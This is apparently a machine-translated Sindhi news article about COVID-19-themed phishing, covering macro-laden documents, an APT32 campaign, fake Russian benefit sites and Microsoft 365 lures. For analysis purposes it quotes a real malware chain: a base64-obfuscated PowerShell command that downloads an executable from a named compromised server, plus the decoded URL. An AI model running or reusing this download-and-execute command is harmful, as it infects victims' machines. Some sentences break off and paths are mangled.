حملو ڪندڙ COVID-19 موضوع جو استحصال جاري رکندا آهن، انهن صارفين لاءِ وڌيڪ ۽ وڌيڪ خطرا پيدا ڪري رهيا آهن جيڪي وڏي دلچسپي سان وبا سان لاڳاپيل هر شيءِ ۾ دلچسپي رکن ٿا. IN
۾ ياد رکو
ڇا توهان چاهيو ٿا مفت ٽيسٽ لاءِ COVID-19؟
ڪورونوايرس تي ٻڌل فشنگ جو هڪ ٻيو اهم مثال هو
ميڪروز کي فعال ڪرڻ لاءِ اڪثر صارفين کي قائل ڪرڻ پڻ آسان هو. هن کي ڪرڻ لاء، هڪ معياري چال استعمال ڪئي وئي: سوالن کي ڀرڻ لاء، توهان کي پهريان ميڪرو کي فعال ڪرڻ جي ضرورت آهي، جنهن جو مطلب آهي ته توهان کي VBA اسڪرپٽ هلائڻ جي ضرورت آهي.
جئين توهان ڏسي سگهو ٿا، VBA اسڪرپٽ خاص طور تي اينٽيوائرس کان ڇڪيل آهي.
ونڊوز ۾ هڪ انتظار جي خاصيت آهي جتي ايپليڪيشن انتظار ڪري ٿي /T <seconds> اڳ ۾ ڊفالٽ "ها" جواب قبول ڪرڻ کان اڳ. اسان جي حالت ۾، اسڪرپٽ عارضي فائلن کي حذف ڪرڻ کان پهريان 65 سيڪنڊن جو انتظار ڪيو:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
۽ انتظار ڪرڻ دوران، مالويئر ڊائون لوڊ ڪيو ويو. هن لاءِ هڪ خاص پاور شيل اسڪرپٽ شروع ڪيو ويو:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 قدر کي ڊيڪوڊنگ ڪرڻ کان پوءِ، PowerShell اسڪرپٽ ڊائون لوڊ ڪري ٿو پوئين دروازي تي جيڪو اڳي ئي هيڪ ٿيل ويب سرور تي واقع آهي جرمني مان:
http://automatischer-staubsauger.com/feature/777777.png
۽ ان کي محفوظ ڪري ٿو نالي هيٺ:
C:UsersPublictmpdirfile1.exe
فولڊر ‘C:UsersPublictmpdir’
ڊهي ويندو آهي جڏهن 'tmps1.bat' فائل هلندي آهي جنهن ۾ ڪمانڊ هوندو آهي cmd /c mkdir ""C:UsersPublictmpdir"".
سرڪاري ادارن تي ٽارگيٽيڊ حملا
ان کان علاوه، FireEye تجزيه نگارن تازو ٻڌايو ته هڪ ٽارگيٽ APT32 حملي جو مقصد ووهان ۾ سرڪاري ڍانچي، ۽ انهي سان گڏ چيني وزارت ايمرجنسي مينيجمينٽ. ورهايل RTFs مان هڪ ۾ نيو يارڪ ٽائمز جي آرٽيڪل جي لنڪ شامل آهي
دلچسپ ڳالهه اها آهي ته سڃاڻپ جي وقت، وائرسٽوٽل جي مطابق، ڪنهن به اينٽي وائرس هن مثال کي ڳولي نه سگهيو.
جڏهن سرڪاري ويب سائيٽون بند آهن
هڪ فشنگ حملي جو سڀ کان وڌيڪ نمايان مثال صرف ٻئي ڏينهن روس ۾ ٿيو. هن جو سبب 3 کان 16 سالن جي ٻارن لاء هڪ ڊگهي-انتظار فائدي جي مقرري هئي. جڏهن 12 مئي 2020 تي درخواستون قبول ڪرڻ جي شروعات جو اعلان ڪيو ويو، لکين ماڻهو رياستي خدمتن جي ويب سائيٽ تي ڊگهي انتظار جي مدد لاءِ پهچي ويا ۽ پورٽل کي هيٺ لاٿو ته ڪنهن پروفيشنل DDoS حملي کان وڌيڪ خراب ناهي. جڏهن صدر چيو ته ”سرڪاري خدمتون درخواستن جي وهڪري کي منهن نه ڏئي سگهيون،“ ماڻهن درخواستون قبول ڪرڻ لاءِ متبادل سائيٽ شروع ڪرڻ بابت آن لائن ڳالهائڻ شروع ڪيو.
مسئلو اهو آهي ته ڪيترن ئي سائيٽن هڪ ڀيرو ڪم ڪرڻ شروع ڪيو، ۽ جڏهن ته هڪ، حقيقي هڪ posobie16.gosuslugi.ru تي، اصل ۾ ايپليڪيشنون قبول ڪري ٿي، وڌيڪ
SearchInform جي ساٿين کي .ru زون ۾ اٽڪل 30 نوان فريب وارا ڊومين مليا. Infosecurity and Softline Company اپريل جي شروعات کان وٺي 70 ساڳين جعلي سرڪاري سروس ويب سائيٽن کي ٽريڪ ڪيو آهي. انهن جا تخليقڪار واقف علامتن کي ٺاهيندا آهن ۽ پڻ استعمال ڪندا آهن لفظن جا مجموعا gosuslugi، gosuslugi-16، vyplaty، covid-vyplaty، posobie وغيره.
هائپ ۽ سوشل انجنيئرنگ
اهي سڀ مثال صرف ان ڳالهه جي تصديق ڪن ٿا ته حملي آور ڪاميابيءَ سان ڪرونا وائرس جي موضوع کي مانيٽائيز ڪري رهيا آهن. ۽ جيترو وڌيڪ سماجي ڇڪتاڻ ۽ وڌيڪ غير واضح مسئلا، اوترو وڌيڪ موقعا آهن اسڪيمرز کي اهم ڊيٽا چوري ڪرڻ، ماڻهن کي مجبور ڪرڻ لاءِ پنهنجو پئسو پاڻ تي ڏيڻ، يا صرف وڌيڪ ڪمپيوٽرن کي هيڪ ڪرڻ.
۽ ڏنو ويو ته وبائي مرض ممڪن طور تي غير تيار ٿيل ماڻهن کي گهر مان ڪم ڪرڻ تي مجبور ڪيو آهي ، نه صرف ذاتي ، پر ڪارپوريٽ ڊيٽا پڻ خطري ۾ آهي. مثال طور، تازو Microsoft 365 (اڳوڻي Office 365) استعمال ڪندڙ پڻ هڪ فشنگ حملي جي تابع هئا. ماڻهن کي خطن سان منسلڪ طور تي وڏي پئماني تي ”مس ٿيل“ آواز جا پيغام مليا. بهرحال، فائلون اصل ۾ هڪ HTML صفحو هئا جيڪي حملي جي متاثرين ڏانهن موڪليا ويا
جو ذريعو: www.habr.com